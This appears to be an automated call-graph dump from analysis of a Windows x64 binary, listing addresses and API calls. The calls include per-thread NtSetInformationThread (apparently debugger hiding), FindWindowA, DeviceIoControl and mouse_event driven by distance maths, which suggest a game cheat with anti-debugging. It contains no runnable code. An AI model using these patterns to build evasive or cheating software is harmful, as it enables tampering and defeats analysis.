??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20461->20466 20462->20459 20463->20462 20469 7ff786615a14 CloseHandle 20463->20469 20465->20447 20465->20461 20465->20465 20466->20447 20467 7ff786615bc4 VirtualAlloc 20472 7ff786615c27 SetLastError GetLastError 20467->20472 20473 7ff786615be2 memset 20467->20473 20468 7ff78662a9e0 7 API calls 20471 7ff7866157d8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20468->20471 20478 7ff786615a30 20469->20478 20470 7ff786615649 20470->20456 20470->20468 20470->20470 20471->20456 20495 7ff786615c42 20472->20495 20474 7ff786615c00 20473->20474 20476 7ff786615df4 VirtualFree 20474->20476 20481 7ff786615c16 VirtualFree 20474->20481 20475 7ff7866159ed 20480 7ff78662a9e0 7 API calls 20475->20480 20482 7ff786615e16 20476->20482 20477 7ff786615fb4 CreateToolhelp32Snapshot 20485 7ff786616077 GetTickCount 20477->20485 20486 7ff786615fd6 Thread32First 20477->20486 20479 7ff78662a9e0 7 API calls 20478->20479 20484 7ff786615ba8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20479->20484 20487 7ff7866159f8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20480->20487 20481->20472 20492 7ff78662a9e0 7 API calls 20482->20492 20483 7ff786615869 20483->20467 20483->20475 20483->20483 20484->20467 20488 7ff786616090 20485->20488 20489 7ff78661606e CloseHandle 20486->20489 20490 7ff786615ff0 GetCurrentProcessId 20486->20490 20487->20469 20488->20488 20491 7ff7866160a6 GetTickCount 20488->20491 20489->20485 20493 7ff78661605c Thread32Next 20490->20493 20494 7ff786615ffc GetCurrentThreadId 20490->20494 20505 7ff786616265 20491->20505 20508 7ff7866160b7 20491->20508 20496 7ff786615f98 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20492->20496 20493->20489 20493->20490 20494->20493 20498 7ff78661600c OpenThread 20494->20498 20495->20477 20497 7ff78662a9e0 7 API calls 20495->20497 20496->20477 20500 7ff786615dd8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20497->20500 20498->20493 20501 7ff786616021 LoadLibraryA GetProcAddress 20498->20501 20499 7ff786616511 GetProcessHeap HeapSetInformation 20502 7ff7866166e4 VirtualAlloc 20499->20502 20513 7ff786616533 20499->20513 20500->20476 20503 7ff786616053 CloseHandle 20501->20503 20504 7ff786616043 NtSetInformationThread 20501->20504 20506 7ff7866168b5 20502->20506 20518 7ff786616706 20502->20518 20503->20493 20504->20503 20505->20499 20512 7ff78662a9e0 7 API calls 20505->20512 20507 7ff78662c970 8 API calls 20506->20507 20511 7ff7866168cc 20507->20511 20509 7ff78662a9e0 7 API calls 20508->20509 20510 7ff786616249 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20509->20510 20510->20505 20511->19729 20515 7ff7866164f5 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20512->20515 20514 7ff78662a9e0 7 API calls 20513->20514 20517 7ff7866166c8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20514->20517 20515->20499 20516 7ff78662a9e0 7 API calls 20519 7ff786616899 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20516->20519 20517->20502 20518->20516 20519->20506 20521 7ff78662a81c 20520->20521 20522 7ff78662a844 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 20521->20522 20523 7ff78662a831 20521->20523 20522->20523 20524 7ff78662a934 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 20523->20524 20527 7ff78662a8d0 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 20523->20527 20528 7ff78662a8ee 20523->20528 20529 7ff78662a8cd 20523->20529 20530 7ff78662a8a3 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 20523->20530 20525 7ff78662434f ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 20524->20525 20526 7ff78662a964 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 20524->20526 20533 7ff78662a590 20525->20533 20526->20525 20527->20528 20531 7ff78662a924 20528->20531 20532 7ff78662a8fe ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 20528->20532 20529->20527 20530->20523 20531->20524 20532->20528 20769 7ff786612230 _Query_perf_frequency _Query_perf_counter 20533->20769 20535 7ff786612230 2 API calls 20537 7ff78662a5b1 20535->20537 20536 7ff78662a696 20536->19738 20537->20535 20537->20536 20538 7ff78662a63b Sleep 20537->20538 20539 7ff78662a65a Sleep 20537->20539 20540 7ff78662a668 Sleep SleepEx 20537->20540 20538->20537 20539->20537 20540->20536 20543 7ff78662cff0 free 20542->20543 20771 7ff7865e13d0 20545->20771 20547 7ff786611172 __stdio_common_vfprintf 20547->19855 20549 7ff78661e9b0 20548->20549 20550 7ff78661e8e6 20548->20550 20772 7ff786611400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 20549->20772 20551 7ff78661e8ec memcpy 20550->20551 20559 7ff78661e90b 20550->20559 20551->19855 20553 7ff78661e91c 20556 7ff78662cfb4 std::_Facet_Register 4 API calls 20553->20556 20554 7ff78661e9b5 20557 7ff786611360 Concurrency::cancel_current_task __std_exception_copy 20554->20557 20555 7ff78661e95d 20558 7ff78661e984 memcpy 20555->20558 20562 7ff78661e932 20556->20562 20563 7ff78661e9bb 20557->20563 20558->19855 20559->20553 20559->20554 20559->20555 20560 7ff78661e97c 20559->20560 20561 7ff78662cfb4 std::_Facet_Register 4 API calls 20560->20561 20564 7ff78661e937 20561->20564 20562->20564 20565 7ff78661e975 _invalid_parameter_noinfo_noreturn 20562->20565 20564->20558 20565->20560 20567 7ff78662aa10 20566->20567 20568 7ff78662aa70 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 20567->20568 20571 7ff78662aa5d 20567->20571 20568->20571 20570 7ff78662aadd ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 20572 7ff78662aafa 20570->20572 20573 7ff78662aa94 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 20570->20573 20571->20570 20571->20573 20576 7ff78662aab5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 20571->20576 20572->20573 20577 7ff78662ab05 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 20572->20577 20574 7ff786627222 Sleep 20573->20574 20575 7ff78662ab6d ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 20573->20575 20574->19795 20574->19796 20575->20574 20576->20571 20576->20573 20577->20572 20577->20573 20579 7ff78662cfce malloc 20578->20579 20580 7ff7866281f2 _beginthreadex 20579->20580 20581 7ff78662cfbf 20579->20581 20580->19773 20580->19780 20581->20579 20582 7ff78662cfde 20581->20582 20583 7ff78662cfe9 20582->20583 20773 7ff78662d7bc 20582->20773 20584 7ff786611360 Concurrency::cancel_current_task __std_exception_copy 20583->20584 20586 7ff78662cfef free 20584->20586 20589 7ff78661abc7 exit 20588->20589 20590 7ff78661abd3 20588->20590 20589->20590 20591 7ff78661acad 20590->20591 20593 7ff78661aca1 exit 20590->20593 20777 7ff7865e50f0 20591->20777 20593->20591 20594 7ff78661acf3 QueryPerformanceFrequency 20595 7ff78661ad24 20594->20595 20596 7ff78661ad0f QueryPerformanceCounter 20594->20596 20791 7ff7865ff050 20595->20791 20596->20595 20601 7ff78661aefe 20602 7ff78661af1c 20601->20602 20605 7ff786602540 3 API calls 20601->20605 20824 7ff7865fec70 20602->20824 20605->20601 20610 7ff7865ff360 14 API calls 20611 7ff78661b013 20610->20611 20612 7ff7866236b0 20611->20612 20613 7ff786623700 PeekMessageA 20612->20613 20614 7ff786623740 GetForegroundWindow 20613->20614 20615 7ff786623726 TranslateMessage DispatchMessageA 20613->20615 20616 7ff78662378d GetClientRect ClientToScreen GetCursorPos GetAsyncKeyState 20614->20616 20617 7ff786623752 GetWindow SetWindowPos 20614->20617 20615->20614 20620 7ff78662381f 20616->20620 20617->20616 20618 7ff78662386e SetWindowPos 20618->20620 20619 7ff7866238e8 GetClientRect QueryPerformanceCounter GetKeyState GetKeyState GetKeyState 20621 7ff7866239c0 ClientToScreen SetCursorPos 20619->20621 20622 7ff7866239ef GetActiveWindow 20619->20622 20620->20618 20620->20619 20963 7ff786603750 20620->20963 20621->20622 20624 7ff786623a0b GetCursorPos 20622->20624 20643 7ff786623a2e 20622->20643 20625 7ff786623a19 ScreenToClient 20624->20625 20624->20643 20625->20643 20627 7ff786623a81 GetAsyncKeyState 20628 7ff786623af8 GetAsyncKeyState 20627->20628 20627->20643 20628->20643 20634 7ff786623ab4 rand 20634->20643 20635 7ff786623e2b _invalid_parameter_noinfo_noreturn 20636 7ff78662cdc0 free 20636->20643 20640 7ff786623cfd 21503 7ff7865e6800 20640->21503 20642 7ff786623db9 DestroyWindow 20649 7ff78662c970 8 API calls 20642->20649 20643->20613 20643->20627 20643->20628 20643->20634 20643->20635 20643->20636 20643->20640 20646 7ff786603750 110 API calls 20643->20646 20975 7ff786603910 20643->20975 20981 7ff78661dd90 20643->20981 21048 7ff7866127c0 20643->21048 21119 7ff78661ecd0 20643->21119 21182 7ff78661b2d0 GetAsyncKeyState 20643->21182 21456 7ff7865e7070 20643->21456 21474 7ff7865e7520 20643->21474 21497 7ff786602e50 20643->21497 20646->20643 20650 7ff786623e0d 20649->20650 20650->19762 20652 7ff78662c979 20651->20652 20653 7ff786628540 20652->20653 20654 7ff78662ce6c IsProcessorFeaturePresent 20652->20654 20653->19857 20655 7ff78662ce84 20654->20655 23268 7ff78662cf40 RtlCaptureContext 20655->23268 20661 7ff786619723 20660->20661 20662 7ff786629823 20660->20662 20661->20262 20663 7ff786629847 20662->20663 20664 7ff786629868 _invalid_parameter_noinfo_noreturn 20662->20664 20665 7ff78662cdc0 free 20663->20665 20665->20661 20667 7ff78661422a ?_Random_device@std@ 20666->20667 20667->20438 20669 7ff78661e8c0 9 API calls 20668->20669 20670 7ff786614360 20669->20670 20671 7ff78661e8c0 9 API calls 20670->20671 20672 7ff786614386 20671->20672 20673 7ff78661e8c0 9 API calls 20672->20673 20674 7ff7866143ac 20673->20674 20675 7ff78661e8c0 9 API calls 20674->20675 20676 7ff7866143d2 20675->20676 20677 7ff78661e8c0 9 API calls 20676->20677 20678 7ff7866143f8 20677->20678 20679 7ff78661e8c0 9 API calls 20678->20679 20680 7ff78661441e 20679->20680 20681 7ff78661e8c0 9 API calls 20680->20681 20682 7ff786614447 20681->20682 20714 7ff78661e9c0 20682->20714 20684 7ff7866144d7 20686 7ff78661e8c0 9 API calls 20684->20686 20685 7ff786614479 20685->20684 20688 7ff7866144bd FindWindowA 20685->20688 20687 7ff78661450f 20686->20687 20689 7ff78661e8c0 9 API calls 20687->20689 20688->20685 20690 7ff786614617 20688->20690 20691 7ff786614538 20689->20691 20735 7ff786628750 20690->20735 20692 7ff78661e8c0 9 API calls 20691->20692 20694 7ff786614560 20692->20694 20696 7ff78661e8c0 9 API calls 20694->20696 20698 7ff786614586 20696->20698 20697 7ff78662c970 8 API calls 20699 7ff786614636 20697->20699 20700 7ff78661e9c0 20 API calls 20698->20700 20699->20470 20702 7ff7866145b6 20700->20702 20701 7ff786614609 20704 7ff786628750 2 API calls 20701->20704 20702->20701 20703 7ff7866145f3 FindWindowA 20702->20703 20703->20701 20703->20702 20704->20690 20706 7ff78662e0e0 20705->20706 20707 7ff786614670 GetCurrentProcess K32EnumProcessModules 20706->20707 20708 7ff7866146c0 20707->20708 20713 7ff786614730 20707->20713 20710 7ff7866146d0 GetCurrentProcess K32GetModuleBaseNameA 20708->20710 20712 7ff786614700 _stricmp 20708->20712 20708->20713 20709 7ff78662c970 8 API calls 20711 7ff786614742 20709->20711 20710->20708 20711->20483 20712->20708 20712->20713 20713->20709 20719 7ff78661ea0b 20714->20719 20727 7ff78661eac8 20714->20727 20715 7ff78662c970 8 API calls 20716 7ff78661eadc 20715->20716 20716->20685 20718 7ff78661ea5c 20724 7ff78662cfb4 std::_Facet_Register 4 API calls 20718->20724 20719->20718 20722 7ff78661ea3d 20719->20722 20723 7ff78661eaf1 20719->20723 20725 7ff78661ea67 20719->20725 20733 7ff78661eaf6 20719->20733 20721 7ff78661eabd 20756 7ff78661ec30 20721->20756 20728 7ff78662cfb4 std::_Facet_Register 4 API calls 20722->20728 20764 7ff786611360 20723->20764 20730 7ff78661ea47 20724->20730 20725->20721 20739 7ff78661eb00 20725->20739 20727->20715 20732 7ff78661ea42 20728->20732 20730->20725 20732->20730 20734 7ff78661ea55 _invalid_parameter_noinfo_noreturn 20732->20734 20767 7ff786628730 ?_Xlength_error@std@@YAXPEBD 20733->20767 20734->20718 20736 7ff786614624 20735->20736 20737 7ff786628761 20735->20737 20736->20697 20738 7ff78661ec30 2 API calls 20737->20738 20738->20736 20740 7ff78661eb2e 20739->20740 20741 7ff78661ec09 20740->20741 20747 7ff78661eb44 20740->20747 20768 7ff786611400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 20741->20768 20743 7ff78661eb4a 20743->20725 20744 7ff78661ec0e 20748 7ff786611360 Concurrency::cancel_current_task __std_exception_copy 20744->20748 20745 7ff78661eb7a 20749 7ff78662cfb4 std::_Facet_Register 4 API calls 20745->20749 20746 7ff78661ebde memcpy 20746->20725 20747->20743 20747->20744 20747->20745 20747->20746 20750 7ff78661ebd9 20747->20750 20751 7ff78661ec14 20748->20751 20752 7ff78661eb90 20749->20752 20753 7ff78662cfb4 std::_Facet_Register 4 API calls 20750->20753 20754 7ff78661eb98 20752->20754 20755 7ff78661ebd2 _invalid_parameter_noinfo_noreturn 20752->20755 20753->20746 20754->20746 20755->20750 20757 7ff78661ec9e 20756->20757 20758 7ff78661ec35 20756->20758 20757->20727 20758->20757 20759 7ff78662cdc0 free 20758->20759 20760 7ff78661ecae _invalid_parameter_noinfo_noreturn 20758->20760 20759->20758 20761 7ff78661eccc 20760->20761 20761->20727 20762 7ff7866287ab 20761->20762 20763 7ff78661ec30 free 20761->20763 20762->20727 20763->20762 20765 7ff78661136e Concurrency::cancel_current_task 20764->20765 20766 7ff78661137f __std_exception_copy 20765->20766 20766->20733 20768->20744 20770 7ff786612258 20769->20770 20770->20537 20771->20547 20772->20554 20776 7ff78662d79c 20773->20776 20775 7ff78662d7ca _CxxThrowException 20776->20775 20778 7ff7865e510d malloc 20777->20778 20779 7ff7865e5107 20777->20779 20780 7ff7865e5139 20778->20780 20782 7ff7865e5141 20778->20782 20779->20778 20851 7ff7865e1450 20780->20851 20783 7ff7865e51b1 20782->20783 20785 7ff7865e5219 20782->20785 20784 7ff7865e51df 20783->20784 20861 7ff7865f3820 20783->20861 20784->20594 20786 7ff7865e5247 20785->20786 20789 7ff7865f3820 3 API calls 20785->20789 20787 7ff7865e5264 20786->20787 20788 7ff7865e524f memcpy 20786->20788 20787->20594 20788->20787 20789->20786 20924 7ff7865e2650 20791->20924 20794 7ff7865ff0ab fseek 20796 7ff7865ff0c4 ftell 20794->20796 20797 7ff7865ff320 fclose 20794->20797 20795 7ff7865ff2fc 20799 7ff78662c970 8 API calls 20795->20799 20796->20797 20798 7ff7865ff0d9 fseek 20796->20798 20797->20795 20798->20797 20800 7ff7865ff0ef malloc 20798->20800 20801 7ff7865ff337 malloc 20799->20801 20800->20797 20803 7ff7865ff119 fread 20800->20803 20812 7ff786602540 20801->20812 20804 7ff7865ff135 fclose 20803->20804 20805 7ff7865ff15b fclose 20803->20805 20806 7ff7865ff14d free 20804->20806 20807 7ff7865ff147 20804->20807 20808 7ff7865ff246 20805->20808 20809 7ff7865ff28c 20805->20809 20806->20795 20807->20806 20934 7ff7865e2470 20808->20934 20810 7ff7865fec70 14 API calls 20809->20810 20810->20795 20813 7ff78660270e 20812->20813 20814 7ff786602559 20812->20814 20815 7ff786602894 20813->20815 20816 7ff78660290c 20813->20816 20817 7ff786602717 20813->20817 20818 7ff7866026e7 memcpy 20814->20818 20821 7ff786602566 20814->20821 20819 7ff7866028d1 20815->20819 20820 7ff7866028d7 memcpy 20815->20820 20822 7ff78660294e memcpy 20816->20822 20823 7ff786602948 20816->20823 20817->20601 20817->20817 20818->20821 20819->20601 20820->20819 20821->20601 20822->20823 20823->20601 20825 7ff7865fec91 malloc 20824->20825 20836 7ff7865fed13 20824->20836 20827 7ff7865fecca 20825->20827 20829 7ff7865fecfb 20825->20829 20828 7ff7866010c0 3 API calls 20827->20828 20828->20829 20939 7ff7865f3400 20829->20939 20830 7ff7865fee86 20831 7ff7865feeae 20830->20831 20834 7ff7865feea8 free 20830->20834 20837 7ff7865feecf 20831->20837 20840 7ff7865feec9 free 20831->20840 20833 7ff7865fee6a malloc memcpy 20833->20830 20834->20831 20835 7ff7865fed52 malloc 20838 7ff7865feda2 20835->20838 20839 7ff7865fed6e memcpy 20835->20839 20836->20835 20836->20838 20843 7ff7865feef0 20837->20843 20838->20830 20838->20833 20841 7ff7865fed9c free 20839->20841 20842 7ff7865fed8a 20839->20842 20840->20837 20841->20838 20842->20841 20844 7ff7865fefda 20843->20844 20946 7ff7865ff760 20844->20946 20846 7ff7865ff040 20847 7ff7865ff360 20846->20847 20848 7ff7865ff391 20847->20848 20849 7ff7865fec70 14 API calls 20848->20849 20850 7ff7865ff49e 20849->20850 20850->20610 20868 7ff7865e2050 20851->20868 20853 7ff7865e1489 20872 7ff7865e1130 20853->20872 20859 7ff7865e19cb memset memset 20859->20782 20862 7ff7865f3835 malloc 20861->20862 20863 7ff7865f389a 20861->20863 20862->20863 20865 7ff7865f3866 memcpy 20862->20865 20863->20784 20866 7ff7865f3894 free 20865->20866 20867 7ff7865f3882 20865->20867 20866->20863 20867->20866 20869 7ff78662df27 20868->20869 20870 7ff7865e20f4 memset 20869->20870 20871 7ff7865e2370 20870->20871 20871->20853 20871->20871 20873 7ff7865e11a3 20872->20873 20876 7ff7865e11bc 20872->20876 20874 7ff7865f3820 3 API calls 20873->20874 20874->20876 20875 7ff7865e11e4 20901 7ff786602cd0 20875->20901 20876->20875 20894 7ff7865f38c0 20876->20894 20879 7ff7865e11f3 20880 7ff7865e1227 20879->20880 20910 7ff786602dc0 20879->20910 20882 7ff7865e124c 20880->20882 20917 7ff7865f3280 20880->20917 20884 7ff7865e1270 memset 20882->20884 20885 7ff7865f3280 3 API calls 20882->20885 20886 7ff7866010c0 20884->20886 20885->20884 20888 7ff7866010da free 20886->20888 20890 7ff7866010fa 20886->20890 20888->20890 20889 7ff786601123 20891 7ff7865e1928 malloc 20889->20891 20893 7ff786601142 free 20889->20893 20890->20889 20892 7ff786601119 free 20890->20892 20891->20859 20892->20889 20893->20891 20895 7ff7865f38d5 malloc 20894->20895 20896 7ff7865f3933 20894->20896 20895->20896 20898 7ff7865f3904 memcpy 20895->20898 20896->20875 20899 7ff7865f392d free 20898->20899 20900 7ff7865f391b 20898->20900 20899->20896 20900->20899 20902 7ff786602daa 20901->20902 20903 7ff786602cea 20901->20903 20902->20879 20904 7ff786602d98 20903->20904 20905 7ff786602d29 malloc 20903->20905 20904->20879 20906 7ff786602d46 memcpy 20905->20906 20907 7ff786602d7a 20905->20907 20908 7ff786602d74 free 20906->20908 20909 7ff786602d62 20906->20909 20907->20879 20908->20907 20909->20908 20911 7ff786602dd5 malloc 20910->20911 20912 7ff786602e35 20910->20912 20911->20912 20914 7ff786602e05 memcpy 20911->20914 20912->20880 20915 7ff786602e2f free 20914->20915 20916 7ff786602e1d 20914->20916 20915->20912 20916->20915 20918 7ff7865f3295 malloc 20917->20918 20919 7ff7865f32f5 20917->20919 20918->20919 20921 7ff7865f32c5 memcpy 20918->20921 20919->20882 20922 7ff7865f32ef free 20921->20922 20923 7ff7865f32dd 20921->20923 20922->20919 20923->20922 20925 7ff7865e2687 20924->20925 20926 7ff7865e272b malloc 20925->20926 20932 7ff7865e273a 20925->20932 20926->20932 20927 7ff7865e27d6 _wfopen 20928 7ff7865e280f 20927->20928 20929 7ff7865e27ee free 20927->20929 20931 7ff78662c970 8 API calls 20928->20931 20929->20928 20933 7ff7865e281c 20931->20933 20932->20927 20933->20794 20933->20795 20938 7ff7865e13d0 20934->20938 20936 7ff7865e2495 __stdio_common_vsprintf 20937 7ff7865e24ca 20936->20937 20937->20809 20938->20936 20940 7ff7865f34a2 20939->20940 20941 7ff7865f3423 20939->20941 20940->20836 20941->20940 20942 7ff7865f3459 malloc 20941->20942 20942->20940 20943 7ff7865f3472 memcpy 20942->20943 20944 7ff7865f349c free 20943->20944 20945 7ff7865f348a 20943->20945 20944->20940 20945->20944 20947 7ff7865ff790 20946->20947 20947->20947 20948 7ff7865ff7c4 malloc 20947->20948 20949 7ff7865ff7dd 20948->20949 20953 7ff7865ff4c0 20949->20953 20954 7ff7865ff522 20953->20954 20955 7ff7865ff528 malloc 20953->20955 20954->20955 20956 7ff7865ff55d 20955->20956 20957 7ff7865ff5f9 20955->20957 20956->20957 20958 7ff786602540 3 API calls 20956->20958 20959 7ff7865fec70 14 API calls 20957->20959 20960 7ff7865ff5da 20958->20960 20961 7ff7865ff733 free 20959->20961 20960->20957 20962 7ff786602540 3 API calls 20960->20962 20961->20846 20962->20960 20964 7ff78660378f 20963->20964 20971 7ff7866037ec 20963->20971 20965 7ff7866037ac 20964->20965 20966 7ff7866037a4 20964->20966 20967 7ff7865feef0 20 API calls 20964->20967 20969 7ff7866037d4 malloc 20965->20969 20965->20971 21614 7ff7865ff8f0 20966->21614 20967->20966 20969->20971 20970 7ff78662c970 8 API calls 20972 7ff7866038f6 20970->20972 20973 7ff7866038a0 memcpy 20971->20973 20974 7ff7866038c3 20971->20974 20972->20619 20973->20973 20973->20974 20974->20970 20976 7ff786603921 20975->20976 20978 7ff786603928 20975->20978 20976->20643 20977 7ff786603a32 SetCursor 20977->20643 20978->20977 20979 7ff786603945 LoadCursorA SetCursor 20978->20979 20979->20643 20982 7ff78661ddfd 20981->20982 20983 7ff78661ddf0 20981->20983 20984 7ff78662c970 8 API calls 20982->20984 21856 7ff786612e10 20983->21856 20987 7ff78661e7dd 20984->20987 20986 7ff78661ddf5 20986->20982 21864 7ff78662a190 20986->21864 20987->20628 20989 7ff78661de21 21872 7ff78662a090 20989->21872 20991 7ff78661de36 21880 7ff78662a360 20991->21880 20994 7ff78662a360 9 API calls 20995 7ff78661de5e 20994->20995 20996 7ff7866127c0 48 API calls 20995->20996 20997 7ff78661df4c 20996->20997 21886 7ff786612330 20997->21886 20999 7ff78661df59 21894 7ff78662a280 20999->21894 21049 7ff78661e8c0 9 API calls 21048->21049 21050 7ff78661281b 21049->21050 21051 7ff78662a090 9 API calls 21050->21051 21052 7ff786612828 21051->21052 21053 7ff78662a090 9 API calls 21052->21053 21054 7ff786612837 21053->21054 21055 7ff78662a090 9 API calls 21054->21055 21056 7ff786612846 21055->21056 21057 7ff78662a090 9 API calls 21056->21057 21058 7ff786612852 21057->21058 21059 7ff78661285a 21058->21059 21060 7ff7866128c2 21058->21060 21062 7ff78661e8c0 9 API calls 21059->21062 21061 7ff78662a090 9 API calls 21060->21061 21063 7ff7866128cb 21061->21063 21064 7ff78661287a 21062->21064 21065 7ff78662a190 9 API calls 21063->21065 21066 7ff7866128bd 21064->21066 21067 7ff7866128b8 21064->21067 21071 7ff7866128b1 _invalid_parameter_noinfo_noreturn 21064->21071 21072 7ff7866128d7 21065->21072 21068 7ff78662c970 8 API calls 21066->21068 21069 7ff78662cdc0 free 21067->21069 21070 7ff786612ced 21068->21070 21069->21066 21070->20643 21071->21067 21072->21066 21073 7ff786612906 DeviceIoControl 21072->21073 21940 7ff7866296d0 21073->21940 21075 7ff786612c01 21076 7ff78662a6b0 7 API calls 21075->21076 21077 7ff786612c29 21076->21077 21081 7ff786629e80 13 API calls 21077->21081 21080 7ff7866129c8 21978 7ff78662a6b0 21080->21978 21083 7ff786612c44 21081->21083 21084 7ff786612c83 21083->21084 21086 7ff786612c7e 21083->21086 21089 7ff786612c77 _invalid_parameter_noinfo_noreturn 21083->21089 21088 7ff78662cdc0 free 21084->21088 21085 7ff7866129f2 21993 7ff786629e80 21085->21993 21090 7ff78662cdc0 free 21086->21090 21092 7ff786612c8b 21088->21092 21089->21086 21090->21084 21091 7ff786612a08 21092->21066 21095 7ff786612cca 21092->21095 21097 7ff786612cc3 _invalid_parameter_noinfo_noreturn 21092->21097 21097->21095 21120 7ff78661efdd 21119->21120 21121 7ff78661ed56 21119->21121 21122 7ff78662a090 9 API calls 21120->21122 22050 7ff78662ca38 AcquireSRWLockExclusive 21121->22050 21130 7ff78661efe9 21122->21130 21126 7ff78661f0c0 21128 7ff78661f313 21126->21128 21131 7ff78661f30e 21126->21131 21136 7ff78661f307 _invalid_parameter_noinfo_noreturn 21126->21136 21132 7ff78662c970 8 API calls 21128->21132 21135 7ff786611b70 9 API calls 21130->21135 21139 7ff78661f053 21130->21139 21137 7ff78662cdc0 free 21131->21137 21138 7ff78661f322 21132->21138 21135->21139 21136->21131 21137->21128 21138->20643 21139->21126 21141 7ff78661f0c5 21139->21141 22055 7ff78662b200 21139->22055 21143 7ff78662a090 9 API calls 21141->21143 21148 7ff78661f0d1 21143->21148 21148->21126 21152 7ff78661f13d 21148->21152 21156 7ff786611b70 9 API calls 21148->21156 21150 7ff78661f19a pow pow pow 21153 7ff78661f1fb 21150->21153 21154 7ff78661f204 sqrt 21150->21154 21152->21150 21162 7ff786611b70 9 API calls 21152->21162 21158 7ff78661f251 21153->21158 21163 7ff78662ca38 3 API calls 21153->21163 21154->21153 21156->21152 21161 7ff786612230 2 API calls 21158->21161 21165 7ff78661f25b 21161->21165 21166 7ff78661f191 21162->21166 21167 7ff78661f230 21163->21167 21165->21126 21170 7ff78661f295 mouse_event mouse_event 21165->21170 21166->21150 21167->21158 21171 7ff786612230 2 API calls 21167->21171 21170->21126 21173 7ff78661f245 21171->21173 22062 7ff78662c9cc AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 21173->22062 21183 7ff78661b32d 21182->21183 22063 7ff7865ecac0 21183->22063 21457 7ff7865e708f 21456->21457 21471 7ff7865e73f5 21456->21471 21458 7ff7865ec6f0 41 API calls 21457->21458 21459 7ff7865e711c 21458->21459 21464 7ff7865e712b 21459->21464 23056 7ff7865f15e0 21459->23056 21461 7ff7865e73b7 21463 7ff7865e73dd 21461->21463 21465 7ff7865f3280 3 API calls 21461->21465 21462 7ff7865e71b2 21462->21461 21472 7ff7865e7219 21462->21472 23077 7ff7865e52a0 21462->23077 21466 7ff7865f3280 3 API calls 21463->21466 21464->21462 21469 7ff7865e7181 21464->21469 23064 7ff7865f1e80 21464->23064 21465->21463 21466->21471 21469->21462 23067 7ff7865ed7f0 21469->23067 21471->20643 21472->21461 23080 7ff7865eda30 21472->23080 21475 7ff7865e7563 21474->21475 21477 7ff7865e7568 21474->21477 21476 7ff7865e7070 62 API calls 21475->21476 21476->21477 21489 7ff7865e75a6 21477->21489 23104 7ff7865f3310 21477->23104 21479 7ff7865e76e1 21480 7ff7865f3310 3 API calls 21479->21480 21482 7ff7865e76f5 21480->21482 21481 7ff7865e765f 21483 7ff7865e76a0 21481->21483 21487 7ff7865e6e80 3 API calls 21481->21487 21484 7ff7865e7724 21482->21484 21485 7ff7865e76fe memcpy 21482->21485 21483->21479 21490 7ff7865e6e80 3 API calls 21483->21490 21493 7ff7865e7754 21484->21493 23119 7ff786602100 21484->23119 21486 7ff7865f3310 3 API calls 21485->21486 21486->21484 21487->21483 21489->21481 23113 7ff7865e6e80 21489->23113 21490->21479 21492 7ff7865e77c7 21494 7ff78662c970 8 API calls 21492->21494 21493->21492 21495 7ff7865f3280 3 API calls 21493->21495 21496 7ff7865e78c4 21494->21496 21495->21492 21496->20643 21498 7ff786603168 21497->21498 21501 7ff786602e84 21497->21501 21499 7ff78662c970 8 API calls 21498->21499 21500 7ff786603743 21499->21500 21500->20643 21501->21498 21502 7ff786603131 memcpy 21501->21502 21502->21498 21502->21501 21504 7ff7865e681e 21503->21504 21508 7ff7865e6856 21503->21508 21504->21508 23141 7ff7865fe9b0 21504->23141 21505 7ff7865e688d 21506 7ff7865e68ce 21505->21506 23169 7ff7865f3950 21505->23169 21509 7ff7865e6900 21506->21509 21513 7ff7865e68f3 free 21506->21513 21508->21505 21556 7ff7865e6d41 21508->21556 23159 7ff7865f25d0 21508->23159 21515 7ff7865e6932 21509->21515 21516 7ff7865e6925 free 21509->21516 21513->21509 21517 7ff7865e6964 21515->21517 21518 7ff7865e6957 free 21515->21518 21516->21515 21519 7ff7865e699d 21517->21519 21520 7ff7865e6990 free 21517->21520 21518->21517 21521 7ff7865e69cf 21519->21521 21522 7ff7865e69c2 free 21519->21522 21520->21519 21523 7ff7865e6a2b 21521->21523 21524 7ff7865e6a1e free 21521->21524 21522->21521 21525 7ff7865e6a50 free 21523->21525 21526 7ff7865e6a5d 21523->21526 21524->21523 21525->21526 21527 7ff7865e6a82 free 21526->21527 21529 7ff7865e6a8f 21526->21529 